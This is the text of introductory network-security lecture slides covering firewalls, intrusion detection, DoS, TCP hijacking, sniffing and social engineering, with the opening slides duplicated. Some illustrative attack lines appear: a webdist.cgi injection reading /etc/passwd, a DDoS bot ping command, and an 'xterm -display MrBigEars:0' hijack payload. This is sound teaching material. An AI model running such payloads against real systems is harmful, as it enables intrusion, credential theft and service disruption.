  • 4. 4 What is “Security”  Dictionary.com says: – 1. Freedom from risk or danger; safety. – 2. Freedom from doubt, anxiety, or fear; confidence. – 3. Something that gives or assures safety, as: • 1. A group or department of private guards: Call building security if a visitor acts suspicious. • 2. Measures adopted by a government to prevent espionage, sabotage, or attack. • 3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant. …etc.
  • 5. 5 What is “Security”  Dictionary.com says: – 1. Freedom from risk or danger; safety. – 2. Freedom from doubt, anxiety, or fear; confidence. – 3. Something that gives or assures safety, as: • 1. A group or department of private guards: Call building security if a visitor acts suspicious. • 2. Measures adopted by a government to prevent espionage, sabotage, or attack. • 3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant. …etc.
  • 6. 6 What is “Security”  Dictionary.com says: – 1. Freedom from risk or danger; safety. – 2. Freedom from doubt, anxiety, or fear; confidence. – 3. Something that gives or assures safety, as: • 1. A group or department of private guards: Call building security if a visitor acts suspicious. • 2. Measures adopted by a government to prevent espionage, sabotage, or attack. • 3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant. …etc.
  • 7. 7 What is “Security”  Dictionary.com says: – 1. Freedom from risk or danger; safety. – 2. Freedom from doubt, anxiety, or fear; confidence. – 3. Something that gives or assures safety, as: • 1. A group or department of private guards: Call building security if a visitor acts suspicious. • 2. Measures adopted by a government to prevent espionage, sabotage, or attack. • 3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant. …etc.
  • 8. 8 Why do we need security?  Protect vital information while still allowing access to those who need it – Trade secrets, medical records, etc.  Provide authentication and access control for resources – Ex: AFS  Guarantee availability of resources – Ex: 5 9’s (99.999% reliability)
  • 9. 9 Who is vulnerable?  Financial institutions and banks  Internet service providers  Pharmaceutical companies  Government and defense agencies  Contractors to various government agencies  Multinational corporations  ANYONE ON THE NETWORK
  • 10. 10 Common security attacks and their countermeasures  Finding a way into the network – Firewalls  Exploiting software bugs, buffer overflows – Intrusion Detection Systems  Denial of Service – Ingress filtering, IDS  TCP hijacking – IPSec  Packet sniffing – Encryption (SSH, SSL, HTTPS)  Social problems – Education
  • 11. 11 Firewalls  Basic problem – many network applications and protocols have security problems that are fixed over time – Difficult for users to keep up with changes and keep host secure – Solution • Administrators limit access to end hosts by using a firewall • Firewall is kept up-to-date by administrators
  • 12. 12 Firewalls  A firewall is like a castle with a drawbridge – Only one point of access into the network – This can be good or bad  Can be hardware or software – Ex. Some routers come with firewall functionality – ipfw, ipchains, pf on Unix systems, Windows XP and Mac OS X have built in firewalls
  • 14. 14 Firewalls  Used to filter packets based on a combination of features – These are called packet filtering firewalls • There are other types too, but they will not be discussed – Ex. Drop packets with destination port of 23 (Telnet) – Can use any combination of IP/UDP/TCP header information – man ipfw on unix47 for much more detail  But why don’t we just turn Telnet off?
  • 15. 15 Firewalls  Here is what a computer with a default Windows XP install looks like: – 135/tcp open loc-srv – 139/tcp open netbios-ssn – 445/tcp open microsoft-ds – 1025/tcp open NFS-or-IIS – 3389/tcp open ms-term-serv – 5000/tcp open UPnP  Might need some of these services, or might not be able to control all the machines on the network
  • 16. 16 Firewalls  What does a firewall rule look like? – Depends on the firewall used  Example: ipfw – /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet  Other examples: WinXP & Mac OS X have built in and third party firewalls – Different graphical user interfaces – Varying amounts of complexity and power
  • 17. 17 Intrusion Detection  Used to monitor for “suspicious activity” on a network – Can protect against known software exploits, like buffer overflows  Open Source IDS: Snort, www.snort.org
  • 18. 18 Intrusion Detection  Uses “intrusion signatures” – Well known patterns of behavior • Ping sweeps, port scanning, web server indexing, OS fingerprinting, DoS attempts, etc.  Example – IRIX vulnerability in webdist.cgi – Can make a rule to drop packets containing the line • “/cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd”  However, IDS is only useful if contingency plans are in place to curb attacks as they are occurring
  • 19. 19 Minor Detour…  Say we got the /etc/passwd file from the IRIX server  What can we do with it?
  • 20. 20 Dictionary Attack  We can run a dictionary attack on the passwords – The passwords in /etc/passwd are encrypted with the crypt(3) function (one-way hash) – Can take a dictionary of words, crypt() them all, and compare with the hashed passwords  This is why your passwords should be meaningless random junk! – For example, “sdfo839f” is a good password • That is not my andrew password • Please don’t try it either
  • 21. 21 Denial of Service  Purpose: Make a network service unusable, usually by overloading the server or network  Many different kinds of DoS attacks – SYN flooding – SMURF – Distributed attacks – Mini Case Study: Code-Red
  • 22. 22 Denial of Service  SYN flooding attack  Send SYN packets with bogus source address – Why?  Server responds with SYN ACK and keeps state about TCP half-open connection – Eventually, server memory is exhausted with this state  Solution: use “SYN cookies” – In response to a SYN, create a special “cookie” for the connection, and forget everything else – Then, can recreate the forgotten information when the ACK comes in from a legitimate connection
  • 24. 24 Denial of Service  SMURF – Source IP address of a broadcast ping is forged – Large number of machines respond back to victim, overloading it
  • 25. 25 Denial of Service I n t e r n e t P e r p e t r a t o r V ic t im I C M P e c h o ( s p o o f e d s o u r c e a d d r e s s o f v ic t im ) S e n t t o I P b r o a d c a s t a d d r e s s I C M P e c h o r e p ly
  • 26. 26 Denial of Service  Distributed Denial of Service – Same techniques as regular DoS, but on a much larger scale – Example: Sub7Server Trojan and IRC bots • Infect a large number of machines with a “zombie” program • Zombie program logs into an IRC channel and awaits commands • Example: – Bot command: !p4 207.71.92.193 – Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000 – Sends 10,000 64k packets to the host (655MB!) • Read more at: http://grc.com/dos/grcdos.htm
  • 27. 27 Denial of Service  Mini Case Study – CodeRed – July 19, 2001: over 359,000 computers infected with Code-Red in less than 14 hours – Used a recently known buffer exploit in Microsoft IIS – Damages estimated in excess of $2.6 billion
  • 28. 28 Denial of Service  Why is this under the Denial of Service category? – CodeRed launched a DDOS attack against www1.whitehouse.gov from the 20th to the 28th of every month! – Spent the rest of its time infecting other hosts
  • 29. 29 Denial of Service  How can we protect ourselves? – Ingress filtering • If the source IP of a packet comes in on an interface which does not have a route to that packet, then drop it • RFC 2267 has more information about this – Stay on top of CERT advisories and the latest security patches • A fix for the IIS buffer overflow was released sixteen days before CodeRed had been deployed!
  • 30. 30 TCP Attacks  Recall how IP works… – End hosts create IP packets and routers process them purely based on destination address alone  Problem: End hosts may lie about other fields which do not affect delivery – Source address – host may trick destination into believing that the packet is from a trusted source • Especially applications which use IP addresses as a simple authentication method • Solution – use better authentication methods
  • 31. 31 TCP Attacks  TCP connections have associated state – Starting sequence numbers, port numbers  Problem – what if an attacker learns these values? – Port numbers are sometimes well known to begin with (ex. HTTP uses port 80) – Sequence numbers are sometimes chosen in very predictable ways
  • 32. 32 TCP Attacks  If an attacker learns the associated TCP state for the connection, then the connection can be hijacked!  Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source – Ex. Instead of downloading and running new program, you download a virus and execute it
  • 33. 33 TCP Attacks  Say hello to Alice, Bob and Mr. Big Ears
  • 34. 34 TCP Attacks  Alice and Bob have an established TCP connection
  • 35. 35 TCP Attacks  Mr. Big Ears lies on the path between Alice and Bob on the network – He can intercept all of their packets
  • 36. 36 TCP Attacks  First, Mr. Big Ears must drop all of Alice’s packets since they must not be delivered to Bob (why?) Packets The Void
  • 37. 37 TCP Attacks  Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network) ISN, SRC=Alice
  • 38. 38 TCP Attacks  What if Mr. Big Ears is unable to sniff the packets between Alice and Bob? – Can just DoS Alice instead of dropping her packets – Can just send guesses of what the ISN is until it is accepted  How do you know when the ISN is accepted? – Mitnick: payload is “add self to .rhosts” – Or, “xterm -display MrBigEars:0”
  • 39. 39 TCP Attacks  Why are these types of TCP attacks so dangerous? Web server Malicious user Trusting web client
  • 40. 40 TCP Attacks  How do we prevent this?  IPSec – Provides source authentication, so Mr. Big Ears cannot pretend to be Alice – Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing what the session key is
  • 41. 41 Packet Sniffing  Recall how Ethernet works …  When someone wants to send a packet to some else …  They put the bits on the wire with the destination MAC address …  And remember that other hosts are listening on the wire to detect for collisions …  It couldn’t get any easier to figure out what data is being transmitted over the network!
  • 42. 42 Packet Sniffing  This works for wireless too!  In fact, it works for any broadcast-based medium
  • 43. 43 Packet Sniffing  What kinds of data can we get?  Asked another way, what kind of information would be most useful to a malicious user?  Answer: Anything in plain text – Passwords are the most popular
  • 44. 44 Packet Sniffing  How can we protect ourselves?  SSH, not Telnet – Many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!) – Now that I have told you this, please do not exploit this information – Packet sniffing is, by the way, prohibited by Computing Services  HTTP over SSL – Especially when making purchases with credit cards!  SFTP, not FTP – Unless you really don’t care about the password or data – Can also use KerbFTP (download from MyAndrew)  IPSec – Provides network-layer confidentiality
  • 45. 45 Social Problems  People can be just as dangerous as unprotected computer systems – People can be lied to, manipulated, bribed, threatened, harmed, tortured, etc. to give up valuable information – Most humans will breakdown once they are at the “harmed” stage, unless they have been specially trained • Think government here…
  • 46. 46 Social Problems  Fun Example 1: – “Hi, I’m your AT&T rep, I’m stuck on a pole. I need you to punch a bunch of buttons for me”
  • 47. 47 Social Problems  Fun Example 2: – Someone calls you in the middle of the night • “Have you been calling Egypt for the last six hours?” • “No” • “Well, we have a call that’s actually active right now, it’s on your calling card and it’s to Egypt and as a matter of fact, you’ve got about $2000 worth of charges on your card and … read off your AT&T card number and PIN and then I’ll get rid of the charge for you”
  • 48. 48 Social Problems  Fun Example 3: – Who saw Office Space? – In the movie, the three disgruntled employees installed a money-stealing worm onto the companies systems – They did this from inside the company, where they had full access to the companies systems • What security techniques can we use to prevent this type of access?
  • 49. 49 Social Problems  There aren’t always solutions to all of these problems – Humans will continue to be tricked into giving out information they shouldn’t – Educating them may help a little here, but, depending on how bad you want the information, there are a lot of bad things you can do to get it  So, the best that can be done is to implement a wide variety of solutions and more closely monitor who has access to what network resources and information – But, this solution is still not perfect
  • 50. 50 Conclusions  The Internet works only because we implicitly trust one another  It is very easy to exploit this trust  The same holds true for software  It is important to stay on top of the latest CERT security advisories to know how to patch any security holes
  • 51. 51 Security related URLs  http://www.robertgraham.com/pubs/network- intrusion-detection.html  http://online.securityfocus.com/infocus/1527  http://www.snort.org/  http://www.cert.org/  http://www.nmap.org/  http://grc.com/dos/grcdos.htm  http://lcamtuf.coredump.cx/newtcp/